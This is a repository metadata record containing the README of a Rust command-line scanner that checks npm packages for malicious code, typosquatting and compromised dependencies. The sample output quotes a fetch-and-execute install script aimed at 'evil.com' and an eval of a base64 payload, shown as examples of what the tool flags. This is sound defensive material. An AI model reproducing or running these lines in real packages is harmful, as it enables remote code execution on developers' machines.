{"id":48205212,"url":"https://github.com/z8run/aegis","last_synced_at":"2026-04-04T18:36:08.436Z","repository":{"id":348867582,"uuid":"1200124314","full_name":"z8run/aegis","owner":"z8run","description":"Supply-chain security scanner for npm packages. Detect malicious code, typosquatting, and compromised dependencies before you install them.","archived":false,"fork":false,"pushed_at":"2026-04-03T07:28:30.000Z","size":95,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-04-03T13:27:49.618Z","etag":null,"topics":["cli","cve","developer-tools","devsecops","malware-detection","npm","npm-audit","npm-security","package-security","rust","sarif","security","static-analysis","supply-chain","tree-sitter","typosquatting","vulnerability-scanner"],"latest_commit_sha":null,"homepage":"https://crates.io/crates/aegis","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/z8run.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2026-04-03T04:07:39.000Z","updated_at":"2026-04-03T07:28:33.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/z8run/aegis","commit_stats":null,"previous_names":["z8run/aegis"],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/z8run/aegis","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/z8run%2Faegis","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/z8run%2Faegis/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/z8run%2Faegis/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/z8run%2Faegis/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/z8run","download_url":"https://codeload.github.com/z8run/aegis/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/z8run%2Faegis/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31409310,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-04T10:20:44.708Z","status":"ssl_error","status_checked_at":"2026-04-04T10:20:06.846Z","response_time":60,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cli","cve","developer-tools","devsecops","malware-detection","npm","npm-audit","npm-security","package-security","rust","sarif","security","static-analysis","supply-chain","tree-sitter","typosquatting","vulnerability-scanner"],"created_at":"2026-04-04T18:36:08.315Z","updated_at":"2026-04-04T18:36:08.407Z","avatar_url":"https://github.com/z8run.png","language":"Rust","funding_links":[],"categories":[],"sub_categories":[],"readme":"# aegis\n\n[![CI](https://img.shields.io/github/actions/workflow/status/z8run/aegis/quality.yml?branch=main\u0026label=CI)](https://github.com/z8run/aegis/actions)\n[![License: MIT](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)\n\nSupply-chain security scanner for npm packages. Detect malicious code, typosquatting, and compromised packages **before** you install them.\n\n```\n$ aegis-scan check suspicious-pkg@1.0.0\n\n  📦 suspicious-pkg@1.0.0\n\n  ⛔ CRITICAL — Code Execution\n  │  eval() with base64 encoded payload\n  │  📄 lib/index.js:14\n  │  └─ eval(Buffer.from(\"d2luZG93cy5sb2NhdGlvbg==\", \"base64\").toString())\n\n  ⚠️  HIGH — Install Script\n  │  postinstall downloads and executes remote script\n  │  📄 package.json\n  │  └─ \"postinstall\": \"curl https://evil.com | bash\"\n\n  Risk: 8.5/10 — DO NOT INSTALL\n```\n\n## Installation\n\n### From crates.io\n\n```bash\ncargo install aegis-scan\n```\n\n### From source\n\n```bash\ngit clone https://github.com/z8run/aegis.git\ncd aegis\ncargo install --path .\n```\n\n### Pre-built binaries\n\nDownload from the [releases page](https://github.com/z8run/aegis/releases).\n\n| Platform | Binary |\n|---|---|\n| Linux x86_64 | `aegis-linux-x86_64` |\n| macOS Apple Silicon | `aegis-macos-arm64` |\n| macOS Intel | `aegis-macos-x86_64` |\n\n## Usage\n\n### Check a package\n\n```bash\naegis-scan check axios\naegis-scan check axios@1.7.0\naegis-scan check @angular/core@17.0.0\n```\n\n### Scan a project\n\n```bash\naegis-scan scan .\naegis-scan scan ./my-project --skip-dev\n```\n\n### Install with security check\n\n```bash\naegis-scan install axios express        # check then install\naegis-scan install                       # check all deps then npm install\naegis-scan install axios --force         # skip confirmation prompts\n```\n\n### Output formats\n\n```bash\naegis-scan check lodash --json           # JSON output\naegis-scan check lodash --sarif          # SARIF v2.1.0 (GitHub Security tab)\n```\n\n### Cache management\n\n```bash\naegis-scan cache clear                   # clear all cached results\naegis-scan check axios --no-cache        # bypass cache for this check\n```\n\n## What it detects\n\n| Analyzer | Description |\n|---|---|\n| **Static code** | `eval()`, `child_process`, network exfiltration, env harvesting via regex |\n| **AST analysis** | tree-sitter JS parsing for structural detection of dangerous patterns |\n| **Install scripts** | Suspicious `postinstall`/`preinstall` commands |\n| **Obfuscation** | High entropy, hex/base64 payloads, encoded strings |\n| **Maintainer tracking** | Ownership transfers, new accounts, takeovers |\n| **AI hallucination** | Packages that LLMs \"invent\" — a growing attack vector |\n| **Typosquatting** | Names similar to popular packages (axois vs axios) |\n| **CVE lookup** | Known vulnerabilities via OSV.dev |\n| **Dependency tree** | Recursive scan of transitive dependencies |\n| **YAML rules** | 10 built-in rules + custom community rules |\n\n## Risk scoring\n\nFindings are weighted by severity and summed to a 0-10 score:\n\n| Severity | Weight | Example |\n|---|---|---|\n| Critical | 3.0 | `eval(Buffer.from(...))`, pipe-to-shell |\n| High | 1.5 | `require('child_process')`, env harvesting |\n| Medium | 0.5 | DNS lookups, WebSocket connections |\n| Low | 0.1 | `fetch()` with dynamic URL, file reads |\n\n| Score | Label |\n|---|---|\n| 0-1 | CLEAN |\n| 1-3 | LOW RISK |\n| 3-5 | MEDIUM RISK |\n| 5-7 | HIGH RISK |\n| 7-10 | DO NOT INSTALL |\n\n## CI/CD\n\n### GitHub Action\n\n```yaml\n- uses: z8run/aegis-action@v1\n  with:\n    path: '.'\n    fail-on: 'high'       # critical, high, medium, low\n    skip-dev: 'false'\n    sarif: 'true'          # upload to GitHub Security tab\n```\n\n### Exit codes\n\n| Code | Meaning |\n|---|---|\n| `0` | No high-risk findings |\n| `1` | HIGH or CRITICAL findings detected |\n| `2` | Runtime error |\n\n## Custom rules\n\nPlace `.yml` files in a `rules/` directory:\n\n```yaml\nid: \"CUSTOM-001\"\nname: \"Crypto wallet regex\"\ndescription: \"Flags packages containing crypto wallet address patterns\"\nseverity: high\ncategory: suspicious\npattern: \"(?:bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}\"\nfile_pattern: \"*.js\"\nexclude_paths:\n  - \"node_modules/\"\n  - \"test/\"\n  - \"*.min.js\"\n```\n\nSee [`rules/examples/`](rules/examples/) for more.\n\n## Architecture\n\n```\nnpm registry → tarball extraction → analyzers → risk scoring → output\n                                        │\n                    ┌───────────────────┼───────────────────┐\n                    │                   │                   │\n               static + AST    metadata-based    external APIs\n              (code patterns)  (maintainer,      (CVE, dep tree)\n                               hallucination)\n```\n\nResults are cached locally (`~/.aegis/cache/`) for 24 hours.\n\n## Contributing\n\nSee [CONTRIBUTING.md](.github/CONTRIBUTING.md) for development setup and guidelines.\n\n## License\n\n[MIT](LICENSE)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fz8run%2Faegis","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fz8run%2Faegis","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fz8run%2Faegis/lists"}